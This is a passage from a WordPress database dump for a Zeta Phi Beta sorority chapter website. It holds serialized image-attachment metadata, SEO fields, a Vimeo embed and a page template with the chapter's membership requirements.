age/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:25:\"Get-Engaged-2-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"Get-Engaged-2-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"Get-Engaged-2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"Get-Engaged-2-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3167,769,'_wp_attached_file','2017/01/LGZPressRelease-pdf-image.jpg'),(3168,769,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:612;s:6:\"height\";i:792;s:4:\"file\";s:37:\"2017/01/LGZPressRelease-pdf-image.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"LGZPressRelease-pdf-image-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"LGZPressRelease-pdf-image-232x300.jpg\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:37:\"LGZPressRelease-pdf-image-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:37:\"LGZPressRelease-pdf-image-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:37:\"LGZPressRelease-pdf-image-612x300.jpg\";s:5:\"width\";i:612;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:37:\"LGZPressRelease-pdf-image-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"LGZPressRelease-pdf-image-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:37:\"LGZPressRelease-pdf-image-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:37:\"LGZPressRelease-pdf-image-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3166,768,'_wp_attached_file','2014/12/LGZPressRelease.pdf'),(2227,6,'_oembed_61c26ed93164c72e60344fd39f10f8ef','<iframe src=\"https://player.vimeo.com/video/114932532\" width=\"300\" height=\"169\" frameborder=\"0\" title=\"Finer Women Don&#039;t Haze\" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe>'),(2228,6,'_oembed_time_61c26ed93164c72e60344fd39f10f8ef','1480774034'),(2229,576,'_wp_attached_file','2016/12/Membership.png'),(2230,576,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2829;s:6:\"height\";i:1591;s:4:\"file\";s:22:\"2016/12/Membership.png\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Membership-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Membership-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Membership-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Membership-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"Membership-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:22:\"Membership-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:22:\"Membership-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:22:\"Membership-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"Membership-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:22:\"Membership-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"Membership-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2234,577,'_wp_attached_file','2014/12/o-GRADUATION-facebook.jpg'),(2235,577,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2000;s:6:\"height\";i:1000;s:4:\"file\";s:33:\"2014/12/o-GRADUATION-facebook.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"o-GRADUATION-facebook-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"o-GRADUATION-facebook-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"o-GRADUATION-facebook-768x384.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"o-GRADUATION-facebook-1024x512.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:33:\"o-GRADUATION-facebook-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:33:\"o-GRADUATION-facebook-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:33:\"o-GRADUATION-facebook-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:33:\"o-GRADUATION-facebook-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"o-GRADUATION-facebook-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"o-GRADUATION-facebook-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"o-GRADUATION-facebook-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:22:\"Getty Images/Flickr RF\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:32:\"Graduates walking towards future\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:9:\"126314316\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3778,689,'_yoast_wpseo_content_score','30'),(3779,689,'_yoast_wpseo_primary_sermon_categories',''),(3776,90,'_yoast_wpseo_content_score','30'),(3777,90,'_yoast_wpseo_primary_cause_categories','68'),(2247,579,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:430;s:6:\"height\";i:200;s:4:\"file\";s:21:\"2016/12/zphibtext.gif\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"zphibtext-150x150.gif\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/gif\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"zphibtext-300x140.gif\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/gif\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"zphibtext-400x200.gif\";s:5:\"width\";i:400;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/gif\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:21:\"zphibtext-180x110.gif\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/gif\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"zphibtext-180x180.gif\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/gif\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"zphibtext-300x200.gif\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/gif\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2248,580,'_wp_attached_file','2016/12/zetaphibeta_dove_blue.png'),(2249,580,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:546;s:6:\"height\";i:413;s:4:\"file\";s:33:\"2016/12/zetaphibeta_dove_blue.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"zetaphibeta_dove_blue-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"zetaphibeta_dove_blue-300x227.png\";s:5:\"width\";i:300;s:6:\"height\";i:227;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:33:\"zetaphibeta_dove_blue-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:33:\"zetaphibeta_dove_blue-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:33:\"zetaphibeta_dove_blue-546x300.png\";s:5:\"width\";i:546;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:33:\"zetaphibeta_dove_blue-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"zetaphibeta_dove_blue-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"zetaphibeta_dove_blue-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2250,581,'_wp_attached_file','2016/12/zetaphibeta_dove_blue-1.png'),(2251,581,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:164;s:6:\"height\";i:124;s:4:\"file\";s:35:\"2016/12/zetaphibeta_dove_blue-1.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"zetaphibeta_dove_blue-1-150x124.png\";s:5:\"width\";i:150;s:6:\"height\";i:124;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:35:\"zetaphibeta_dove_blue-1-164x110.png\";s:5:\"width\";i:164;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2344,595,'_wp_attached_file','2016/12/ServingHC.png'),(2345,595,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:555;s:4:\"file\";s:21:\"2016/12/ServingHC.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"ServingHC-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"ServingHC-270x300.png\";s:5:\"width\";i:270;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"ServingHC-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:21:\"ServingHC-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:21:\"ServingHC-500x300.png\";s:5:\"width\";i:500;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:21:\"ServingHC-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"ServingHC-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"ServingHC-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2360,598,'_wp_attached_file','2016/12/c82-black-girls-code-2349465.jpg'),(2361,598,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:286;s:4:\"file\";s:40:\"2016/12/c82-black-girls-code-2349465.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"c82-black-girls-code-2349465-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"c82-black-girls-code-2349465-300x215.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:40:\"c82-black-girls-code-2349465-400x286.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:286;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:40:\"c82-black-girls-code-2349465-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:40:\"c82-black-girls-code-2349465-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:40:\"c82-black-girls-code-2349465-300x286.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:286;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2363,599,'_wp_attached_file','2016/11/12193870_899448590090488_441039363732937755_n.jpg'),(2364,599,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:540;s:4:\"file\";s:57:\"2016/11/12193870_899448590090488_441039363732937755_n.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:57:\"12193870_899448590090488_441039363732937755_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:57:\"12193870_899448590090488_441039363732937755_n-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:57:\"12193870_899448590090488_441039363732937755_n-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:57:\"12193870_899448590090488_441039363732937755_n-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:57:\"12193870_899448590090488_441039363732937755_n-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:57:\"12193870_899448590090488_441039363732937755_n-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:57:\"12193870_899448590090488_441039363732937755_n-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:57:\"12193870_899448590090488_441039363732937755_n-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:57:\"12193870_899448590090488_441039363732937755_n-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:57:\"12193870_899448590090488_441039363732937755_n-600x540.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:540;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2365,493,'_thumbnail_id','1164'),(5193,1313,'ts_template','a:1:{i:0;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"auto\";s:13:\"bgAttachement\";s:0:\"\";s:8:\"bgRepeat\";s:9:\"no-repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:1:\"0\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:4:{i:0;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:40;s:11:\"admin-label\";s:0:\"\";}}}i:1;a:2:{s:4:\"size\";i:8;s:8:\"elements\";a:5:{i:0;a:9:{s:4:\"type\";s:5:\"title\";s:10:\"title-icon\";s:11:\"icon-noicon\";s:5:\"title\";s:19:\"Sorority Membership\";s:11:\"title-color\";s:7:\"#2741a6\";s:8:\"subtitle\";s:0:\"\";s:14:\"subtitle-color\";s:7:\"#3f4549\";s:5:\"style\";s:16:\"lineariconcenter\";s:4:\"size\";s:2:\"h1\";s:11:\"admin-label\";s:0:\"\";}i:1;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:40;s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:1849:\"<p>Although membership in Zeta Phi Beta Sorority, Inc. is by invitation only, we encourage interested women with a track record of community service and currently in possession of a baccalaureate degree to contact Lambda Gamma Zeta Chapter for more information. </p><p><strong><span style=--quote--color: #2041a5;--quote-->Benefits of Membership</span></strong></p><p>There are many benefits to membership, including a dynamic sisterhood. In addition, Zeta Phi Beta Sorority, Inc. provides benefits with professional development and personal networks. </p><p><strong><span style=--quote--color: #2041a5;--quote-->Becoming a Member</span></strong></p><p>Women interested in membership who have a commitment to scholarship, service, sisterhood and finer womanhood are encouraged to express interest in Zeta Phi Beta Sorority, Inc. Those interested must: </p><ul><li>Express formal interest by attending an Informational Meeting</li><li>Possess a bachelor’s level degree conferred from that meets the Sorority’s accreditation standards.</li><li>If applying within three (3) years after graduating with the bachelor’s degree, must have either earned at least a 2.5 grade point average on a 4.0 scale for the bachelor’s level degree or earned an advanced degree such as a master’s or professional degree.</li></ul><p><span style=--quote--color: #2041a5;--quote--><strong>Looking for a New Zeta Home?</strong></span></p><p>Are you already a member of our illustrious sisterhood? If you are currently active in a graduate chapter, recently graduating from an undergraduate chapter and seeking a new graduate chapter, or if you have been inactive, Lambda Gamma Zeta Chapter may be the right home for you. </p><p>If you are interested in membership, contact our Vice President, Lillet Williams using the Membership Interest Contact Form. </p>\";s:11:\"admin-label\";s:0:\"\";}i:3;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:40;s:11:\"admin-label\";s:0:\"\";}i:4;a:4:{s:4:\"type\";s:10:\"shortcodes\";s:11:\"admin-label\";s:0:\"\";s:8:\"paddings\";s:1:\"n\";s:10:\"shortcodes\";s:53:\"[gravityform id=\"10\" title=\"true\" description=\"true\"]\";}}}i:2;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:40;s:11:\"admin-label\";s:0:\"\";}}}i:3;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:1:{s:4:\"type\";s:5:\"empty\";}}}}}}'),(3360,829,'_wp_attached_file','2017/01/LOGO-LGZ_Small.png'),(3361,829,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:171;s:6:\"height\";i:200;s:4:\"file\";s:26:\"2017/01/LOGO-LGZ_Small.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"LOGO-LGZ_Small-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:26:\"LOGO-LGZ_Small-171x110.png\";s:5:\"width\";i:171;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"LOGO-LGZ_Small-171x180.png\";s:5:\"width\";i:171;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2866,672,'_edit_lock','1483077191:1'),(2867,672,'_edit_last','1'),(3173,771,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:221;s:6:\"height\";i:300;s:4:\"file\";s:20:\"2016/12/amicette.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"amicette-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s